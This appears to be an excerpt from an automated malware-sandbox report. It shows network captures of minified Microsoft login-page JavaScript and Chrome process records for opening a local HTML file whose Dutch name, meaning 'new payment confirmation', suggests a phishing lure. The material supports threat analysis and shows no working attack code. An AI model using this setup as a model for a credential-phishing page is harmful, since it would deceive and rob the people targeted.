                                                                                                                  2024-12-19 10:43:29 UTC16383INData Raw: 2e 76 62 28 65 2c 72 29 2b 22 7d 7d 7d 22 3b 73 3d 6e 65 77 20 46 75 6e 63 74 69 6f 6e 28 22 24 63 6f 6e 74 65 78 74 22 2c 22 24 65 6c 65 6d 65 6e 74 22 2c 75 29 2c 6f 3d 69 5b 61 5d 3d 73 7d 72 65 74 75 72 6e 20 6f 28 74 2c 6e 29 7d 63 61 74 63 68 28 63 29 7b 74 68 72 6f 77 20 63 2e 6d 65 73 73 61 67 65 3d 22 55 6e 61 62 6c 65 20 74 6f 20 70 61 72 73 65 20 62 69 6e 64 69 6e 67 73 2e 5c 6e 42 69 6e 64 69 6e 67 73 20 76 61 6c 75 65 3a 20 22 2b 65 2b 22 5c 6e 4d 65 73 73 61 67 65 3a 20 22 2b 63 2e 6d 65 73 73 61 67 65 2c 63 7d 7d 7d 29 2c 53 2e 67 61 2e 69 6e 73 74 61 6e 63 65 3d 6e 65 77 20 53 2e 67 61 2c 53 2e 62 28 22 62 69 6e 64 69 6e 67 50 72 6f 76 69 64 65 72 22 2c 53 2e 67 61 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65
                                                                                                                  Data Ascii: .vb(e,r)+"}}}";s=new Function("$context","$element",u),o=i[a]=s}return o(t,n)}catch(c){throw c.message="Unable to parse bindings.\nBindings value: "+e+"\nMessage: "+c.message,c}}}),S.ga.instance=new S.ga,S.b("bindingProvider",S.ga),function(){function e(e
                                                                                                                  2024-12-19 10:43:29 UTC16383INData Raw: 74 22 29 26 26 6e 2e 68 61 73 28 22 76 61 6c 75 65 22 29 2c 64 3d 6e 2e 67 65 74 28 22 6f 70 74 69 6f 6e 73 49 6e 63 6c 75 64 65 44 65 73 74 72 6f 79 65 64 22 29 3b 74 3d 7b 7d 3b 76 61 72 20 66 2c 70 3d 5b 5d 3b 6c 7c 7c 28 73 3f 70 3d 53 2e 61 2e 4d 62 28 72 28 29 2c 53 2e 77 2e 4d 29 3a 30 3c 3d 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 26 26 70 2e 70 75 73 68 28 53 2e 77 2e 4d 28 65 2e 6f 70 74 69 6f 6e 73 5b 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 5d 29 29 29 2c 63 26 26 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 63 2e 6c 65 6e 67 74 68 26 26 28 63 3d 5b 63 5d 29 2c 66 3d 53 2e 61 2e 6a 62 28 63 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 64 7c 7c 65 3d 3d 3d 61 7c 7c 6e 75 6c 6c 3d 3d 3d 65 7c 7c 21 53
                                                                                                                  Data Ascii: t")&&n.has("value"),d=n.get("optionsIncludeDestroyed");t={};var f,p=[];l||(s?p=S.a.Mb(r(),S.w.M):0<=e.selectedIndex&&p.push(S.w.M(e.options[e.selectedIndex]))),c&&("undefined"==typeof c.length&&(c=[c]),f=S.a.jb(c,(function(e){return d||e===a||null===e||!S
                                                                                                                  2024-12-19 10:43:29 UTC16383INData Raw: 6e 20 69 7c 7c 28 69 3d 74 2e 74 65 78 74 28 29 7c 7c 22 22 2c 69 3d 6c 2e 74 65 6d 70 6c 61 74 65 28 6e 75 6c 6c 2c 22 7b 7b 6b 6f 5f 77 69 74 68 20 24 69 74 65 6d 2e 6b 6f 42 69 6e 64 69 6e 67 43 6f 6e 74 65 78 74 7d 7d 22 2b 69 2b 22 7b 7b 2f 6b 6f 5f 77 69 74 68 7d 7d 22 29 2c 74 2e 64 61 74 61 28 22 70 72 65 63 6f 6d 70 69 6c 65 64 22 2c 69 29 29 2c 74 3d 5b 6e 2e 24 64 61 74 61 5d 2c 6e 3d 6c 2e 65 78 74 65 6e 64 28 7b 6b 6f 42 69 6e 64 69 6e 67 43 6f 6e 74 65 78 74 3a 6e 7d 2c 72 2e 74 65 6d 70 6c 61 74 65 4f 70 74 69 6f 6e 73 29 2c 28 6e 3d 6c 2e 74 6d 70 6c 28 69 2c 74 2c 6e 29 29 2e 61 70 70 65 6e 64 54 6f 28 6f 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 29 2c 6c 2e 66 72 61 67 6d 65 6e 74 73 3d 7b 7d 2c 6e 7d 2c 74 68 69 73
                                                                                                                  Data Ascii: n i||(i=t.text()||"",i=l.template(null,"{{ko_with $item.koBindingContext}}"+i+"{{/ko_with}}"),t.data("precompiled",i)),t=[n.$data],n=l.extend({koBindingContext:n},r.templateOptions),(n=l.tmpl(i,t,n)).appendTo(o.createElement("div")),l.fragments={},n},this


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  25192.168.2.1649753152.199.21.1754436456C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-19 10:43:31 UTC410OUTGET /shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js HTTP/1.1
                                                                                                                  Host: aadcdn.msftauth.net
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-12-19 10:43:32 UTC750INHTTP/1.1 200 OK
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                  Age: 6685237
                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                  Content-MD5: m5bMCfnonQM0ui+8IrUZeg==
                                                                                                                  Content-Type: application/x-javascript
                                                                                                                  Date: Thu, 19 Dec 2024 10:43:31 GMT
                                                                                                                  Etag: 0x8DCE31CBE97473C
                                                                                                                  Last-Modified: Wed, 02 Oct 2024 19:59:37 GMT
                                                                                                                  Server: ECAcc (lhc/78AB)
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  X-Cache: HIT
                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                  x-ms-request-id: fb7c97c3-801e-0062-1535-154340000000
                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                  Content-Length: 142367
                                                                                                                  Connection: close
                                                                                                                  2024-12-19 10:43:32 UTC16383INData Raw: 2f 2a 21 0a 20 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 53 54 41 52 54 20 4f 46 20 54 48 49 52 44 20 50 41 52 54 59 20 4e 4f 54 49 43 45 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 2a 20 0a 20 2a 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 62 61 73 65 64 20 6f 6e 20 6f 72 20 69 6e 63 6f 72 70 6f 72 61 74 65 73 20 6d 61 74 65 72 69 61 6c 20 66 72 6f 6d 20 74 68 65 20 70 72 6f 6a 65 63 74 73 20 6c 69 73 74 65 64 20 62 65 6c 6f 77 20 28 54 68 69 72 64 20 50 61 72 74 79 20 49 50 29 2e 20 54 68 65 20 6f 72 69 67 69 6e 61 6c 20 63 6f 70 79 72 69 67 68 74 20 6e 6f 74 69 63 65 20 61
                                                                                                                  Data Ascii: /*! * ------------------------------------------- START OF THIRD PARTY NOTICE ----------------------------------------- * * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice a
                                                                                                                  2024-12-19 10:43:32 UTC1INData Raw: 29
                                                                                                                  Data Ascii: )
                                                                                                                  2024-12-19 10:43:32 UTC16383INData Raw: 29 7d 66 6f 72 28 76 61 72 20 6f 3d 30 3b 6f 3c 74 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 6f 5d 2e 73 70 6c 69 74 28 22 2c 22 29 2e 6d 61 70 28 4e 75 6d 62 65 72 29 2c 61 3d 69 5b 30 5d 2c 73 3d 69 5b 31 5d 2c 75 3d 69 5b 32 5d 3b 69 66 28 72 28 65 2c 61 2c 73 2c 75 29 29 72 65 74 75 72 6e 21 30 7d 72 65 74 75 72 6e 21 21 6c 2e 66 69 72 73 74 28 6e 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 3d 3d 3d 65 2e 74 72 69 6d 28 29 7d 29 29 7d 69 66 28 5f 2e 69 73 48 69 67 68 43 6f 6e 74 72 61 73 74 28 29 29 7b 76 61 72 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 62 6f 64 79 22 29 5b 30 5d 2c 6e 3d 5f 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 74 29
                                                                                                                  Data Ascii: )}for(var o=0;o<t.length;o++){var i=t[o].split(",").map(Number),a=i[0],s=i[1],u=i[2];if(r(e,a,s,u))return!0}return!!l.first(n,(function(t){return t===e.trim()}))}if(_.isHighContrast()){var t=document.getElementsByTagName("body")[0],n=_.getComputedStyle(t)
                                                                                                                  2024-12-19 10:43:32 UTC16383INData Raw: 50 5f 45 5f 4e 41 4d 45 5f 54 4f 4f 5f 53 48 4f 52 54 3a 22 38 30 30 34 31 31 30 31 22 2c 50 50 5f 45 5f 4e 41 4d 45 5f 49 4e 56 41 4c 49 44 3a 22 38 30 30 34 31 31 30 33 22 2c 50 50 5f 45 5f 49 4e 56 41 4c 49 44 41 52 47 3a 22 38 30 30 34 38 33 38 38 22 2c 50 50 5f 45 5f 53 41 5f 54 4f 4f 53 48 4f 52 54 3a 22 38 30 30 34 31 31 32 30 22 2c 50 50 5f 45 5f 53 41 5f 54 4f 4f 4c 4f 4e 47 3a 22 38 30 30 34 31 31 32 31 22 2c 50 50 5f 45 5f 49 4e 56 41 4c 49 44 5f 50 48 4f 4e 45 4e 55 4d 42 45 52 3a 22 38 30 30 34 31 31 33 46 22 2c 50 50 5f 45 5f 53 45 43 52 45 54 51 5f 43 4f 4e 54 41 49 4e 53 5f 53 45 43 52 45 54 41 3a 22 38 30 30 34 31 31 36 35 22 2c 50 50 5f 45 5f 53 45 43 52 45 54 41 5f 43 4f 4e 54 41 49 4e 53 5f 53 45 43 52 45 54 51 3a 22 38 30 30 34 31 31
                                                                                                                  Data Ascii: P_E_NAME_TOO_SHORT:"80041101",PP_E_NAME_INVALID:"80041103",PP_E_INVALIDARG:"80048388",PP_E_SA_TOOSHORT:"80041120",PP_E_SA_TOOLONG:"80041121",PP_E_INVALID_PHONENUMBER:"8004113F",PP_E_SECRETQ_CONTAINS_SECRETA:"80041165",PP_E_SECRETA_CONTAINS_SECRETQ:"800411
                                                                                                                  2024-12-19 10:43:32 UTC16383INData Raw: 22 55 49 45 76 65 6e 74 73 22 5d 3d 5b 22 6b 65 79 75 70 22 2c 22 6b 65 79 64 6f 77 6e 22 2c 22 6b 65 79 70 72 65 73 73 22 5d 2c 70 2e 4d 6f 75 73 65 45 76 65 6e 74 73 3d 22 63 6c 69 63 6b 20 64 62 6c 63 6c 69 63 6b 20 6d 6f 75 73 65 64 6f 77 6e 20 6d 6f 75 73 65 75 70 20 6d 6f 75 73 65 6d 6f 76 65 20 6d 6f 75 73 65 6f 76 65 72 20 6d 6f 75 73 65 6f 75 74 20 6d 6f 75 73 65 65 6e 74 65 72 20 6d 6f 75 73 65 6c 65 61 76 65 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 65 28 70 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 74 2e 6c 65 6e 67 74 68 29 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 74 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 68 5b 74 5b 6e 5d 5d 3d 65 7d 29 29 3b 76 61 72 20 67 2c 6d 3d 7b 70 72 6f 70 65 72 74 79 63 68 61 6e 67 65 3a 21 30
                                                                                                                  Data Ascii: "UIEvents"]=["keyup","keydown","keypress"],p.MouseEvents="click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave".split(" "),e(p,(function(e,t){if(t.length)for(var n=0,r=t.length;n<r;n++)h[t[n]]=e}));var g,m={propertychange:!0
                                                                                                                  2024-12-19 10:43:32 UTC16383INData Raw: 2c 6f 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6e 29 72 65 74 75 72 6e 20 6e 2e 6f 7d 7d 7d 28 29 2c 53 2e 62 28 22 63 6f 6d 70 75 74 65 64 43 6f 6e 74 65 78 74 22 2c 53 2e 53 29 2c 53 2e 62 28 22 63 6f 6d 70 75 74 65 64 43 6f 6e 74 65 78 74 2e 67 65 74 44 65 70 65 6e 64 65 6e 63 69 65 73 43 6f 75 6e 74 22 2c 53 2e 53 2e 71 61 29 2c 53 2e 62 28 22 63 6f 6d 70 75 74 65 64 43 6f 6e 74 65 78 74 2e 67 65 74 44 65 70 65 6e 64 65 6e 63 69 65 73 22 2c 53 2e 53 2e 56 61 29 2c 53 2e 62 28 22 63 6f 6d 70 75 74 65 64 43 6f 6e 74 65 78 74 2e 69 73 49 6e 69 74 69 61 6c 22 2c 53 2e 53 2e 59 61 29 2c 53 2e 62 28 22 63 6f 6d 70 75 74 65 64 43 6f 6e 74 65 78 74 2e 72 65 67 69 73 74 65 72 44 65 70 65 6e 64 65 6e 63 79 22 2c 53 2e 53 2e 63 63 29 2c 53 2e 62 28 22 69 67
                                                                                                                  Data Ascii: ,o:function(){if(n)return n.o}}}(),S.b("computedContext",S.S),S.b("computedContext.getDependenciesCount",S.S.qa),S.b("computedContext.getDependencies",S.S.Va),S.b("computedContext.isInitial",S.S.Ya),S.b("computedContext.registerDependency",S.S.cc),S.b("ig
                                                                                                                  2024-12-19 10:43:32 UTC16383INData Raw: 2b 53 2e 6d 2e 76 62 28 65 2c 72 29 2b 22 7d 7d 7d 22 3b 73 3d 6e 65 77 20 46 75 6e 63 74 69 6f 6e 28 22 24 63 6f 6e 74 65 78 74 22 2c 22 24 65 6c 65 6d 65 6e 74 22 2c 75 29 2c 6f 3d 69 5b 61 5d 3d 73 7d 72 65 74 75 72 6e 20 6f 28 74 2c 6e 29 7d 63 61 74 63 68 28 63 29 7b 74 68 72 6f 77 20 63 2e 6d 65 73 73 61 67 65 3d 22 55 6e 61 62 6c 65 20 74 6f 20 70 61 72 73 65 20 62 69 6e 64 69 6e 67 73 2e 5c 6e 42 69 6e 64 69 6e 67 73 20 76 61 6c 75 65 3a 20 22 2b 65 2b 22 5c 6e 4d 65 73 73 61 67 65 3a 20 22 2b 63 2e 6d 65 73 73 61 67 65 2c 63 7d 7d 7d 29 2c 53 2e 67 61 2e 69 6e 73 74 61 6e 63 65 3d 6e 65 77 20 53 2e 67 61 2c 53 2e 62 28 22 62 69 6e 64 69 6e 67 50 72 6f 76 69 64 65 72 22 2c 53 2e 67 61 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e
                                                                                                                  Data Ascii: +S.m.vb(e,r)+"}}}";s=new Function("$context","$element",u),o=i[a]=s}return o(t,n)}catch(c){throw c.message="Unable to parse bindings.\nBindings value: "+e+"\nMessage: "+c.message,c}}}),S.ga.instance=new S.ga,S.b("bindingProvider",S.ga),function(){function
                                                                                                                  2024-12-19 10:43:32 UTC5INData Raw: 55 6e 73 65 74
                                                                                                                  Data Ascii: Unset
                                                                                                                  2024-12-19 10:43:32 UTC16383INData Raw: 22 29 26 26 6e 2e 68 61 73 28 22 76 61 6c 75 65 22 29 2c 64 3d 6e 2e 67 65 74 28 22 6f 70 74 69 6f 6e 73 49 6e 63 6c 75 64 65 44 65 73 74 72 6f 79 65 64 22 29 3b 74 3d 7b 7d 3b 76 61 72 20 66 2c 70 3d 5b 5d 3b 6c 7c 7c 28 73 3f 70 3d 53 2e 61 2e 4d 62 28 72 28 29 2c 53 2e 77 2e 4d 29 3a 30 3c 3d 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 26 26 70 2e 70 75 73 68 28 53 2e 77 2e 4d 28 65 2e 6f 70 74 69 6f 6e 73 5b 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 5d 29 29 29 2c 63 26 26 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 63 2e 6c 65 6e 67 74 68 26 26 28 63 3d 5b 63 5d 29 2c 66 3d 53 2e 61 2e 6a 62 28 63 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 64 7c 7c 65 3d 3d 3d 61 7c 7c 6e 75 6c 6c 3d 3d 3d 65 7c 7c 21 53 2e
                                                                                                                  Data Ascii: ")&&n.has("value"),d=n.get("optionsIncludeDestroyed");t={};var f,p=[];l||(s?p=S.a.Mb(r(),S.w.M):0<=e.selectedIndex&&p.push(S.w.M(e.options[e.selectedIndex]))),c&&("undefined"==typeof c.length&&(c=[c]),f=S.a.jb(c,(function(e){return d||e===a||null===e||!S.
                                                                                                                  2024-12-19 10:43:32 UTC16383INData Raw: 20 69 7c 7c 28 69 3d 74 2e 74 65 78 74 28 29 7c 7c 22 22 2c 69 3d 6c 2e 74 65 6d 70 6c 61 74 65 28 6e 75 6c 6c 2c 22 7b 7b 6b 6f 5f 77 69 74 68 20 24 69 74 65 6d 2e 6b 6f 42 69 6e 64 69 6e 67 43 6f 6e 74 65 78 74 7d 7d 22 2b 69 2b 22 7b 7b 2f 6b 6f 5f 77 69 74 68 7d 7d 22 29 2c 74 2e 64 61 74 61 28 22 70 72 65 63 6f 6d 70 69 6c 65 64 22 2c 69 29 29 2c 74 3d 5b 6e 2e 24 64 61 74 61 5d 2c 6e 3d 6c 2e 65 78 74 65 6e 64 28 7b 6b 6f 42 69 6e 64 69 6e 67 43 6f 6e 74 65 78 74 3a 6e 7d 2c 72 2e 74 65 6d 70 6c 61 74 65 4f 70 74 69 6f 6e 73 29 2c 28 6e 3d 6c 2e 74 6d 70 6c 28 69 2c 74 2c 6e 29 29 2e 61 70 70 65 6e 64 54 6f 28 6f 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 29 2c 6c 2e 66 72 61 67 6d 65 6e 74 73 3d 7b 7d 2c 6e 7d 2c 74 68 69 73 2e
                                                                                                                  Data Ascii: i||(i=t.text()||"",i=l.template(null,"{{ko_with $item.koBindingContext}}"+i+"{{/ko_with}}"),t.data("precompiled",i)),t=[n.$data],n=l.extend({koBindingContext:n},r.templateOptions),(n=l.tmpl(i,t,n)).appendTo(o.createElement("div")),l.fragments={},n},this.


                                                                                                                  Click to jump to process

                                                                                                                  Click to jump to process

                                                                                                                  Click to jump to process

                                                                                                                  Target ID:0
                                                                                                                  Start time:05:42:41
                                                                                                                  Start date:19/12/2024
                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\NieuwBetalingsbevestigingvoor vanas.eu.htm
                                                                                                                  Imagebase:0x7ff7f9810000
                                                                                                                  File size:3'242'272 bytes
                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  Target ID:2
                                                                                                                  Start time:05:42:42
                                                                                                                  Start date:19/12/2024
                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1984 --field-trial-handle=1896,i,10602721750565109592,8126371862419672758,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                  Imagebase:0x7ff7f9810000
                                                                                                                  File size:3'242'272 bytes
                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  No disassembly